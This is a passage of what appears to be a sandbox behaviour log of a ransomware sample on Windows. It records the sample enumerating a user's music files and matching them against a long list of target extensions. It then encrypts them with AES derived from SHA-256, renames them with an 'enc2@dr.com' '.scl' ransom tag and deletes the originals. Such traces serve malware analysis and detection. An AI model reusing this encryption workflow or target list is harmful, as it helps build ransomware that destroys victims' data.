.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0192.879] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0192.879] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0192.879] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0192.884] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x17f12, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x17f12, lpOverlapped=0x0) returned 1
	[0192.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.889] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb198) returned 1
	[0192.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.891] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0192.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.892] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0192.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.892] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9370) returned 1
	[0192.892] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.892] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x17f12, dwBufLen=0x17f12 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x17f20) returned 1
	[0192.896] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.896] RtlMoveMemory (in: Destination=0xff50a0, Source=0xfdd180, Length=0x17f12 | out: Destination=0xff50a0) 
	[0192.896] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.896] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff50a0*, pdwDataLen=0x18a1ec*=0x17f12, dwBufLen=0x17f20 | out: pbData=0xff50a0*, pdwDataLen=0x18a1ec*=0x17f20) returned 1
	[0192.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.898] CryptDestroyKey (hKey=0xfb9370) returned 1
	[0192.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.899] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0192.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.899] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0192.899] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0192.899] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0192.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0192.900] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0192.902] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 124
	[0192.902] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0192.937] WriteFile (in: hFile=0x390, lpBuffer=0xff50a0*, nNumberOfBytesToWrite=0x17f20, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xff50a0*, lpNumberOfBytesWritten=0x18a648*=0x17f20, lpOverlapped=0x0) returned 1
	[0193.088] CloseHandle (hObject=0x390) returned 1
	[0193.089] CloseHandle (hObject=0x388) returned 1
	[0193.089] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3")) returned 1
	[0193.104] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\4p5dpvfnh8i1im.mp3")) returned 0
	[0193.105] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192bb530, ftCreationTime.dwHighDateTime=0x1d9681f, ftLastAccessTime.dwLowDateTime=0xc2b528b0, ftLastAccessTime.dwHighDateTime=0x1d97694, ftLastWriteTime.dwLowDateTime=0xc2b528b0, ftLastWriteTime.dwHighDateTime=0x1d97694, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="C1Fpy4-8p1N", cAlternateFileName="C1FPY4~1")) returned 1
	[0193.105] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2321910, ftCreationTime.dwHighDateTime=0x1d970cd, ftLastAccessTime.dwLowDateTime=0xca10df60, ftLastAccessTime.dwHighDateTime=0x1d9726f, ftLastWriteTime.dwLowDateTime=0xca10df60, ftLastWriteTime.dwHighDateTime=0x1d9726f, nFileSizeHigh=0x0, nFileSizeLow=0xd582, dwReserved0=0x0, dwReserved1=0x0, cFileName="hk5 gvpU6W_QAvxB7oV.wav", cAlternateFileName="HK5GVP~1.WAV")) returned 1
	[0193.105] lstrcmpW (lpString1="hk5 gvpU6W_QAvxB7oV.wav", lpString2="..") returned 1
	[0193.105] lstrcmpW (lpString1="hk5 gvpU6W_QAvxB7oV.wav", lpString2=".") returned 1
	[0193.105] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\"
	[0193.105] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\", lpString2="hk5 gvpU6W_QAvxB7oV.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\hk5 gvpU6W_QAvxB7oV.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\hk5 gvpU6W_QAvxB7oV.wav"
	[0193.106] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\hk5 gvpU6W_QAvxB7oV.wav") returned 87
	[0193.106] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0193.106] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\hk5 gvpU6W_QAvxB7oV.wav", cchLength=0x57 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav") returned 0x57
	[0193.106] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0193.106] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0193.106] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav"
	[0193.107] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\hk5 gvpu6w_qavxb7ov.wav") returned 87
	[0193.107] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0193.107] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0193.107] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0193.107] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0193.108] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".wav") returned=".wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rw